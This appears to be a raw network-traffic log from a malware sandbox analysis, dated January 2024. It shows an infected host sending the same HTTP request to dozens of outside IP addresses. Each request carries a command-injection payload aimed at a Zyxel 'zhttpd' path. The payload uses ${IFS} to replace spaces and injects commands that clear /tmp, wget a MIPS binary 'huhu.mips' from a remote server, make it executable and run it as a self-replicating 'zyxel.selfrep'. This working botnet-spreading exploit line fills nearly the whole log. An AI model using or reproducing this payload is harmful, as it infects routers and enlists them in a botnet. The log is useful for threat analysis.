                                                Jan 29, 2024 07:07:38.107686043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1756192.168.2.235714231.124.242.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.107747078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1757192.168.2.2346150174.81.144.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.107812881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1758192.168.2.2345980206.55.50.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.107861996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1759192.168.2.235456465.70.245.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.107920885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1760192.168.2.234778883.107.228.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.108026981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1761192.168.2.2353558145.221.100.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.108057976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1762192.168.2.2348620126.132.71.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.108113050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1763192.168.2.2357208156.235.117.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.108195066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1764192.168.2.2359726191.82.53.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.108254910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1765192.168.2.234393492.167.237.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.108309031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1766192.168.2.234480447.37.2.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.108376026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1767192.168.2.235907888.219.138.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.108428955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1768192.168.2.235171876.130.111.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.108479977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1769192.168.2.2334676189.97.213.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.108563900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1770192.168.2.2351170165.182.179.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.108618021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1771192.168.2.2344746173.32.61.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.108688116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1772192.168.2.2342424159.0.23.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.108752012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1773192.168.2.233988057.214.218.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.108831882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1774192.168.2.2333920112.222.197.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.108886957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1775192.168.2.2340694169.27.209.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.108952999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1776192.168.2.2357408104.109.117.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.109004974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1777192.168.2.234134241.98.22.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.109039068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1778192.168.2.2343298222.78.234.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.109101057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1779192.168.2.2346014195.150.133.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.109168053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1780192.168.2.2337810219.155.242.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.109220982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1781192.168.2.233494289.204.84.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.109308958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1782192.168.2.2356872184.217.183.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.109345913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1783192.168.2.2348878165.132.205.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.109416008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1784192.168.2.2335026221.43.224.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.109499931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1785192.168.2.2338478206.197.70.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.109553099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1786192.168.2.2358112118.173.63.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.109631062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1787192.168.2.233495412.37.172.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.109687090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1788192.168.2.2347528132.20.60.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.109751940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1789192.168.2.234749862.207.100.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.109811068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1790192.168.2.2347902134.233.70.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.109899044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1791192.168.2.2352490100.196.112.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.109941006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1792192.168.2.2348676186.67.103.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.110006094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1793192.168.2.235804076.191.220.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.110060930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1794192.168.2.235229853.132.152.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.110126972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1795192.168.2.235045073.119.210.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.110177040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1796192.168.2.2343568137.73.211.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.110244989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1797192.168.2.2356866113.100.228.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.110315084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1798192.168.2.2347134158.244.106.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.110383987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1799192.168.2.2350360134.196.219.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.110455990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1800192.168.2.2349946208.98.60.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.110518932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1801192.168.2.2352532165.125.2.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.110573053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1802192.168.2.2340782101.74.46.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.110641003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1803192.168.2.2346542203.127.102.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.110726118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1804192.168.2.2334780205.169.236.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.110800028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1805192.168.2.2339902156.45.34.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.110847950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1806192.168.2.235527680.43.248.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.110930920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1807192.168.2.235209098.249.173.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.110975027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1808192.168.2.2341824193.1.102.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.111033916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1809192.168.2.2355650172.6.96.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.111098051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1810192.168.2.2335608109.201.186.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.111169100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1811192.168.2.2357956152.90.246.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.111226082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1812192.168.2.2339366157.104.103.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.111285925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1813192.168.2.234402675.202.241.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.111342907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1814192.168.2.2335954148.33.255.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.111402988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1815192.168.2.235892269.134.46.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.111465931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1816192.168.2.234754266.226.238.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.111531973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1817192.168.2.2355628136.62.93.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.111592054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1818192.168.2.234382612.147.197.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.111634970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1819192.168.2.235728412.178.250.73443
                                                TimestampBytes transferredDirectionData
